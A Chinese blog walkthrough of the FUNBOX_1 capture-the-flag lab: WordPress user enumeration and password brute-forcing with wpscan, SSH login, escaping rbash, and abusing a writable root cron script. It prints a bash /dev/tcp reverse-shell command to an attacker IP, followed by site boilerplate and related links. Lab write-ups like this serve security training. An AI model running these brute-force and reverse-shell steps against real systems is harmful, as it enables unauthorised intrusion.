FUNBOX_1靶场详解

这篇具有很好参考价值的文章主要介绍了FUNBOX_1靶场详解。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

FUNBOX_1靶场复盘

这个系列的靶场给出的干扰因素都挺多的,必须从中找到有用的线索才可以。

这个靶场你扫描到ip地址后打开网页会发现,ip自动转换成域名了,所以我们需要添加一条hosts解析才可以。

192.168.102.190		funbox.fritz.box

从目录扫描中可以看出这是一个wordpress的网站。

FUNBOX_1靶场详解,打靶机系列,服务器,web安全,linux

利用wpscan工具可以枚举wordpress的用户名。

wpscan --url http://funbox.fritz.box --enumerate u

FUNBOX_1靶场详解,打靶机系列,服务器,web安全,linux

然后对用户名进行爆破一下,发现两个的密码都出来了。

wpscan --url http://funbox.fritz.box -U users -P /usr/share/wordlists/rockyou.txt

FUNBOX_1靶场详解,打靶机系列,服务器,web安全,linux

这里是利用joe用户进行了ssh登陆,当然也可以登陆wordpress后台,但是没什么可用的东西。

登陆后发现这是一个rbash,就是这是一个只读bash。

FUNBOX_1靶场详解,打靶机系列,服务器,web安全,linux

利用ssh的-t参数我们可以跳过这个限制。

FUNBOX_1靶场详解,打靶机系列,服务器,web安全,linux

ssh上来后,ls一下发现有个mbox文件,发现类似两个邮件,并且是隔了几分钟的,所以就怀疑后台在运行着一个计时任务。

就wget下来一个pspy64,这个文件可以实时监控进程。

FUNBOX_1靶场详解,打靶机系列,服务器,web安全,linux

发现的确有一个计时任务,有两个用户都在运行,一个是UID为1000的,一个是root用户,只要我们能往这里面写的内容就可以拿到一个root的反弹shell。

FUNBOX_1靶场详解,打靶机系列,服务器,web安全,linux

发现这个文件我们是可修改的,在里面添加了一条反弹shell文件,就等拿到UID为1000的权限或者,root权限,如过没拿到ROOT权限就重新监听一下。

FUNBOX_1靶场详解,打靶机系列,服务器,web安全,linux

过了一会儿就拿到root权限了,这里应该是普通用户执行两次后root用户才会执行一次,所以要监控好root用户什么时候执行。

bash -i >/dev/tcp/192.168.102.129/8888 0>&1

FUNBOX_1靶场详解,打靶机系列,服务器,web安全,linux文章来源地址https://www.toymoban.com/news/detail-607384.html

到了这里,关于FUNBOX_1靶场详解的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Java | 详解 创建Web项目、配置Tomcat服务器、实现登录效果

    目录 一、相关工具及技术         1、相关工具         2、相关技术         3、相关 jar 包 二、IDEA 创建 web 项目         1、创建空项目         2、classes目录和lib目录配置         3、tomcat 服务器配置 三、MySQL 配置         1、登录 mysql         2、创建 user 表      

    2024年02月03日
    浏览(56)
  • Linux下Web服务器工作模型及Nginx工作原理详解

    在Linux环境下,Web服务器处理并发连接请求的工作模型主要有阻塞、非阻塞、同步、异步等方式。以下是对各种工作模型的浅析: 同步阻塞 I/O: 类比于在餐厅等饭,需要在取餐处等待,期间不能进行其他事情。 同步非阻塞 I/O: 类比于在餐厅等饭,可以进行其他事情,但需

    2024年02月03日
    浏览(43)
  • Vulnhub之Funbox 1靶机详细测试过程

    作者:jason_huawen 名称:Funbox: 1 地址: 利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.164 NMAP扫描结果表明目标主机有4个开放端口:21(FTP)、22(SSH)、80(HTTP)、33060(Mysqlx?) 目标主机不允许匿名访问; FTP服务软件维ProFTDd,但版本未知 Kali Linux上浏览器访问

    2024年02月03日
    浏览(36)
  • web靶场——xss-labs靶机平台的搭建和代码审计

    目录 一、web靶场-xss-labs靶机平台的搭建 1、将下载好的压缩包放置php的WWW根目录下 2、配置网站 3、启动MYSQL和Nginx 4、完成后我们就可以在浏览器输入127.0.0.1:8088进入靶场 二、xss-labs靶场通关攻略 第一关: 1、输入代码进行测试:源代码 我们直接将参数插入标题试一试 第二关

    2024年02月04日
    浏览(52)
  • SSRF服务器请求伪造原理和pikachu靶场实验

    ★★ 免责声明★★ 文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与学习之用,读者将信息做其他用途,由Ta承担全部法律及连带责任,文章作者不承担任何法律及连带责任。 1、SSRF简介 SSRF全称:Server-Side Request Forgery,服务器端请求伪造,是指攻击者能够从易受攻

    2024年03月13日
    浏览(49)
  • Vulnhub之Funbox 4靶机详细测试过程(提权成功)

    名称:Funbox: CTF URL: 将靶机导入 VirtualBox。配置其网卡为主机模式配置。启动 Kali Linux 和靶机。 内置 netdiscovery工具 可以将靶机的 IP 地址识别为 192.168.56.150。 利用NMAP工具进行全端口扫描: NMAP扫描结果表明目标主机有4个开放端口: 22(ssh),80(http),110(pop3),143(imap) 其实作者给出了

    2024年02月03日
    浏览(44)
  • 云服务器利用Docker搭建sqli-labs靶场环境

    一、安装宝塔面板 使用xshell、electerm、SecureCRT等远程终端连接登陆上云服务器,在Linux宝塔面板使用脚本安装 安装后,如下图:按照提示,在云服务器防火墙/安全组放行Linux宝塔面板的端口 在浏览器打开上述网址,登录Linux宝塔面板: 二、安装Docker 在Linux宝塔面板登陆后,在

    2024年02月10日
    浏览(53)
  • MiniGPT4系列之二推理篇命令行方式:在RTX-3090 Ubuntu服务器推理详解

    MiniGPT4系列之一部署篇:在RTX-3090 Ubuntu服务器部署步骤详解_seaside2003的博客-CSDN博客 MiniGPT4系列之二推理篇命令行方式:在RTX-3090 Ubuntu服务器推理详解_seaside2003的博客-CSDN博客 MiniGPT4系列之三模型推理 (Web UI):在RTX-3090 Ubuntu服务器推理_seaside2003的博客-CSDN博客 本文参考以下知乎

    2024年02月17日
    浏览(46)
  • 搭建web服务器和NFS服务器

    网站需求: 1.基于域名www.openlab.com可以访问网站内容为 welcome to openlab!!! 2.给该公司创建三个子界面分别显示学生信息,教学资料和缴费网站,基于www.openlab.com/student/ 网站访问学生信息,www.openlab.com/data/网站访问教学资料www.openlab.com/money/网站访问缴费网站。 3.要求 (1)学生

    2024年01月23日
    浏览(52)
  • Web入门-Web服务器

    Web服务器是一个程序软件, 对HTTP协议的操作进行封装 ,使得程序员不必直接对程序进行操作,让Web开发更加便捷, 简化web程序开发 。主要功能是“通过网上信息浏览服务”。 概念:Tomcat是阿Apache软件基金会一个核心项目,是一个开源免费轻量级的web服务器,支持Servlet/J

    2024年02月13日
    浏览(56)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包